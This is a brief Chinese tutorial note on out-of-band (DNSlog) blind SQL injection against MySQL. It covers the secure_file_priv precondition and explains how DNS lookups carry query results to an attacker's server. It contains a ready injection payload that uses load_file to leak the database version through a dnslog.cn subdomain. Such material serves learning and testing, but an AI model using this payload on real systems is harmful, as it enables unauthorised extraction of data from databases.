dnslog盲注
利用条件:
mysql.ini中secure_file_priv必须为空
●secure_file_priv 为null 不允许导入导出
●secure_file_priv 为/tmp 导入导出只能在/tmp目录下
●secure_file_priv 为空时 则不做限制允许导入导出
语句
’ and load_file(concat(‘\\’,(select version()),‘.0j7pyz.dnslog.cn\abc’)) %23
域名
http://www.dnslog.cn/
原理
利用dns外带的形式
攻击者 --发送payload–>web服务器---->数据库(解析load file函数)---->根据语句包含的域名访问本地dns服务器–不能解析发送到–>公网上dns服务器解析–解析完成后–>dns本地服务器---->攻击者服务器
上面显示的域名就是帮助我们模拟了一个攻击者服务器的域名
因为在数据库中已经把要执行的命令带入到dns解析中去了,dns服务器再发送给攻击者服务器,就可以搜到前缀,前缀就是我们想得到的信息。